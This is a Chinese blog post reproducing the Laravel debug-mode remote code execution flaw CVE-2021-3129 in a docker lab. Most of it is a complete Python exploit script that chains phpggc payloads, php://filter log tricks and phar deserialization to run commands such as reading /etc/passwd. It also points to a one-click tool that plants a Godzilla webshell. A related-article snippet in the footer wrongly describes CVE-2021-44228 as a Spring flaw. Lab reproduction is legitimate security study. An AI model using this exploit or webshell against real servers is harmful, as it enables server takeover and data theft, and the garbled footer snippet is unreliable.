Laravel Debug mode RCE(CVE-2021-3129)漏洞复现

最新推荐文章于 2024-07-08 11:36:29 发布
最新推荐文章于 2024-07-08 11:36:29 发布
阅读量1.2k 收藏 2
点赞数
文章标签: 安全 linux docker
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17841153/article/details/115600237
版权

Laravel Debug mode RCE(CVE-2021-3129)漏洞复现

参考链接:

https://blog.csdn.net/qq_42570883/article/details/113693926

https://blog.csdn.net/qq_41832837/article/details/113410247?utm_medium=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-1.control&dist_request_id=1330144.21217.16181225919973107&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2~default~BlogCommendFromMachineLearnPai2~default-1.control

更新源:

apt-get update

进入docker环境:
 

cd /test/vulhub/

mkdir ./CVE/CVE-2021-3129

cd /CVE/CVE-2021-3129

利用github上已有的镜像环境:

git clone https://github.com/SNCKER/CVE-2021-3129

访问http://x.x.x.x:8888/

点击Generate app key生成应用程序密钥

点击刷新

程序搭建完毕:

使用该exp需要phpggc环境,放在exp同目录下运行即可。

git clone https://github.com/ambionics/phpggc.git

给phpggc可执行权限:

chmod 777 ./phpggc/phpggc

修改exploit.py脚本中的url地址为攻击目标。

exploit.py如下:

#!/usr/bin/python3
 
import requests as req
import os, uuid
 
 
class Exp:
    __gadget_chains = {
        "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
        "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
        "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys;print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""",
    }  # phpggc链集合,暂时添加rce1后续再添加其他增强通杀能力
 
    __delimiter_len = 8  # 定界符长度
 
    def __vul_check(self):
        resp = req.get(self.__url, verify=False)
        if resp.status_code != 405 and "laravel" not in resp.text:
            return False
        return True
 
    def __payload_send(self, payload):
        header = {
            "Accept": "application/json"
        }
        data = {
            "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution",
            "parameters": {
                "variableName": "cve20213129",
                "viewFile": ""
            }
        }
        data["parameters"]["viewFile"] = payload
        resp = req.post(self.__url, headers=header, json=data, verify=False)
        # print(resp.text)
        return resp
 
    def __command_handler(self, command):
        """
        因为用户命令要注入到payload生成的命令中,为了防止影响结构,所以进行一些处理。
        """
 
        self.__delimiter = str(uuid.uuid1())[:self.__delimiter_len]  # 定界符用于定位页面中命令执行结果的位置。
        # print(delimiter)
        command = "echo %s && %s && echo %s" % (self.__delimiter, command, self.__delimiter)
        # print(command)
 
        escaped_chars = [' ', '&', '|']  # 我只想到这么多,可自行添加。
        for c in escaped_chars:
            command = command.replace(c, '\\' + c)
        # print(command)
        return command
 
    def __clear_log(self):
        return self.__payload_send(
            "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
 
    def __gen_payload(self, gadget_chain):
        gen_shell = self.__gadget_chains[gadget_chain] % (self.__command)
        # print(gen_shell)
        os.system(gen_shell)
        with open('payload.txt', 'r') as f:
            payload = f.read().replace('\n', '') + 'a'  # 添加一个字符使得两个完整的payload总是只有一个可以正常解码
        os.system("rm payload.txt")
        # print(payload)
        return payload
 
    def __decode_log(self):
        return self.__payload_send(
            "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../storage/logs/laravel.log")
 
    def __unserialize_log(self):
        return self.__payload_send("phar://../storage/logs/laravel.log/test.txt")
 
    def __rce(self):
        text = self.__unserialize_log().text
        # print(text)
 
        echo_find = text.find(self.__delimiter)
        # print(echo_find)
        if echo_find >= 0:
            return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)]
        else:
            return "[-] RCE echo is not found."
 
    def exp(self):
        for gadget_chain in self.__gadget_chains.keys():
            print("[*] Try to use %s for exploitation." % (gadget_chain))
            self.__clear_log()
            self.__clear_log()
            self.__payload_send('a' * 2)
            self.__payload_send(self.__gen_payload(gadget_chain))
            self.__decode_log()
            print("[*] Result:")
            print(self.__rce())
 
    def __init__(self, target, command):
        self.target = target
        self.__url = req.compat.urljoin(target, "_ignition/execute-solution")
        self.__command = self.__command_handler(command)
        if not self.__vul_check():
            print("[-] [%s] is seems not vulnerable." % (self.target))
            print("[*] You can also call obj.exp() to force an attack.")
        else:
            self.exp()
 
 
def main():
    Exp("http://127.0.0.1:8888", "cat /etc/passwd")
 
 
if __name__ == '__main__':
    main()

一直执行失败,未找到原因:

下载一键getshell,连接哥斯拉木马EXP:

git clone https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP

执行命令:

python3 laravel-CVE-2021-3129-EXP.py http://127.0.0.1:8888

直接访问的效果:

用哥斯拉连接。

 

我们好像在哪见过 t
关注
漏洞复现CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞
做自己喜欢的事,并将其发挥到极致!
03-03 1万+
文章目录前言一、漏洞简介二、影响范围三、环境搭建四、漏洞复现五、修复方法六、参考链接 前言 仅供安全研究和技术学习,切勿用于非法用途,切记! 一、漏洞简介 当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响范围 Laravel < 8.4.3 facade
CVE-2021-3156 漏洞复现笔记
热门推荐
weixin_46483787的博客
07-01 1万+
CVE-2021-3156复现笔记
Laravel Debug mode 远程代码执行(CVE-2021-3129
jammny
01-30 3447
漏洞详情 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)当Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 漏洞影响 Laravel <= 8.4.2 Ignition <= 2.5.1 漏洞利用 下载靶场:gi
Laravel RCECVE-2021-3129漏洞复现
szgyunyun的博客
07-13 3424
Laravel框架简介 Laravel是一套简洁、优雅的PHP Web开发框架(PHP Web Framework)。它可以让你从面条一样杂乱的代码中解脱出来;它可以帮你构建一个完美的网络APP,而且每行代码都可以简洁、富于表达力。 在Laravel中已经具有了一套高级的PHP ActiveRecord实现 – Eloquent ORM。它能方便的将“约束(constraints)”应用到关系的双方,这样你就具有了对数据的完全控制,而且享受到ActiveRecord的所有便利。Eloquent原生支持Flu
【阿一网络安全laravel 远程代码执⾏ (CVE-2021-3129
Ayixy的博客
07-08 412
它可以让你从面条一样杂乱的代码。它可以帮你构建一个完美的网络。,攻击者可以通过发起恶意请求。,攻击者可以通过发起恶意请求。,而且每行代码都可以简洁。,最终造成远程代码执行。,最终造成远程代码执行。,此处为写⼊⼀句话⽊⻢到。Ignition 组。()函数的不安全使用。Laravel 自。()函数的不安全使用。,没有对应⽂件或⽬录。
Laravel 远程代码执行漏洞(CVE-2021-3129)复现
oiadkt的博客
04-24 5679
Laravel 远程代码执行漏洞(CVE-2021-3129)
漏洞复现| Laravel Debug mode RCECVE-2021-3129
qq_42570883的博客
02-05 4646
漏洞名称】 Laravel Debug mode RCECVE-2021-3129) 【漏洞详情】 近日,国外某安全研究团队披露了 Laravel <= 8.4.2 存在远程代码执行漏洞。当Laravel开启了Debug模式时,由于Laravel自带的Ignition功能的某些接口存在过滤不严,攻击者可以发起恶意请求,通过构造恶意Log文件等方式触发Phar反序列化,从而造成远程代码执行,控制服务器。漏洞细节已在互联网公开。 【漏洞编号】 CVE-2021-3129 【验证工具】 https://
Laravel RCECVE-2021-3129复现
m0_64815693的博客
01-27 2415
CVE-2021-3129漏洞复现 Laravel Debug mode RCE
Laravel Debug mode RCECVE-2021-3129漏洞利用
z.mumu的博客
12-07 1476
访问Laravel 访问/_ignition/execute-solution 抓包 会出现如下页面 2. 检测 修改为POST,添加内容 并且修改 Content-Type: application/json { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "username", "viewFile":.
laravel-exploits:针对CVE-2021-3129漏洞利用
05-25
laravel漏洞 漏洞利用CVE-2021-3129详细信息: ://www.ambionics.io/blog/laravel-debug-rce 用法 $ php -d ' phar.readonly=0 ' ./phpggc --phar phar -o /tmp/exploit.phar --fast-destruct monolog/rce1 system id $ ./laravel-ignition-rce.py http://localhost:8000/ /tmp/exploit.phar Log file: /work/pentest/laravel/laravel/storage/logs/laravel.log Logs cleared Successfully converted to PHAR ! Phar deserialized -----------
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129-EXP 自动写shell的exp
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞
m0_58596609的博客
11-30 1962
CVE-2021-3129 Laravel Debug mode 远程代码执行漏洞
Laravel Debug mode 远程代码执行漏洞(CVE-2021-3129 )
qq_73767109的博客
07-03 1190
Laravel < 8.4.3可以实现日志利用造成phar反序列化。
漏洞复现CVE-2021-3129_laravel远程代码执行漏洞_写入木马getshell
serendipity1130的博客
09-09 2388
1.
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞
thelostworld
01-29 4210
CVE-2021-3129-Laravel Debug mode 远程代码执行漏洞 ​ 一、漏洞简介 Laravel是一套简洁、开源的PHP Web开发框架,旨在实现Web软件的MVC架构。 Laravel开启了Debug模式时,由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用,攻击者可以通过发起恶意请求,构造恶意Log文件等方式触发Phar反序列化,最终造成远程代码执行。 二、影响版本 Larav..
linux中如何通过echo输出!(叹号)? -bash: !": event not found
weixin_43146112的博客
01-20 972
linux中如何通过echo输出!(叹号)? -bash: !": event not found 例如 #!/bin/bash echo "hello world!" 会报错-bash: !": event not found 但是!前后加上空格,就不会报错了 echo "hello world ! " ...
CVE-2021-44228漏洞复现
最新发布
07-27
CVE-2021-44228是一个安全漏洞,通常被称为“Spring Remote Code Execution (RCE)”,它影响了Spring Framework的一些版本,尤其是在处理恶意输入的情况下可能导致远程代码执行。这个漏洞涉及到Spring WebMVC框架中的`WebInputConverter`机制,攻击者通过精心构造的HTTP请求,可以利用该漏洞将恶意脚本注入到应用程序中。 复现实验需要以下步骤: 1. **环境搭建**:首先,你需要一个受影响的Spring应用实例,通常是运行在服务器上的,例如Tomcat或Jetty等Web容器。 2. **获取样本**:找到包含漏洞利用示例的PoC(Proof of Concept)代码,这通常包括一些特定的URL、POST数据以及可能的触发条件。 3. **模拟攻击**:创建一个本地工具(如curl、Postman或自动化测试框架),向服务器发送包含恶意payload的HTTP请求。payload可能包括JavaScript、SQL或其他能被执行的语言片段。 4. **检查响应**:观察服务器对请求的响应,如果返回了预期的异常结果或者执行了非授权的操作,那么就可能意味着复现成功。 5. **验证修复**:如果你的应用已经更新并修复了这个漏洞,尝试相同的请求,看看是否还能够触发漏洞。 请注意,实际操作时应在受控环境下进行,并确保遵守所有法律法规,切勿用于非法活动。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值